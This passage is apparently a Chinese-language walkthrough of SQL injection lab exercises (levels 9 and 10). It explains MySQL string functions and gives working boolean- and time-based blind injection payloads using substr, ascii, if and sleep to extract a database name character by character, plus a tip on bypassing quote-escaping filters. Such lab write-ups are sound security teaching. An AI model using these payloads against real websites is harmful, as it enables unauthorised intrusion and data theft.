substr(str, pos, len)：将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的，不是数组的0开始

mid(str,pos,len):跟上面的一样，截取字符串

 ascii(str)：返回字符串str的最左面字符的ASCII代码值。

ord(str):同上，返回ascii码

if(a,b,c) :a为条件，a为true，返回b，否则返回c，如if(1>2,1,0),返回0

 

盲注需要一个字符一个字符的来判断，必须如先判断当前的数据库名的第一个字符是什么（可以使用sqlmap或脚本）

输入?id=1' and ascii(substr((select database()),1,1))>104 %23   发现程序不报错

?id=1' and ascii(substr((select database()),1,1))>200 %23

 

说明数据库名的第一个字符的ascii码在104到200之间 ，继续用二分法找出这个字符的具体ascii码以及之后的数据库名的各个字符。

 

第九关：

这里输入?id=1'  ?id=1"页面都没有变化，说明之前的注入方法都没用，包括boolean型盲注也都不行了。

尝试基于时间的盲注，这里需要介绍一个mysql内置的函数sleep(5)  表示执行这个函数时会延迟5秒。（每种数据库都有各自延时函数）

可以用F12看下网站处理这个请求正常需要的时间

输入?id=1

需要一秒左右的时间

输入id=1' and sleep(5) %23

处理这个请求用了6秒，说明程序执行了and后面的sql语句，只是没有数据显示而已。

后面和流程和boolean型盲注就有点类似了

输入 id=1' and if(ascii(substr((select database()),1,1))>64,sleep(5),0) %23

 

 

成功延迟了，说明当前数据库名的第一个字符的ascii码是大于64的。

后面的流程就和boolean一样了，没什么好讲的了，时间问题。

 

第十关：

这题也是个基于时间的盲注，但是输入?id=1' and sleep(5) %23后没有延迟，这个时候还是应该先尝试下 ?id=1" and sleep(5) %23 以及?id=1") and sleep(5) %23

如果都不延迟，则可能是不存在注入。尝试发现?id=1" and sleep(5) %23 会延迟，则说明后台是使用双引符号进行拼凑。

---------------------------------------补充----------------------------------------

这里需要补充一下，如果是注入参数是int类型的，使用基于时间的盲注将无视daddslashes这些过滤函数，因为并不需要使用单双引符号！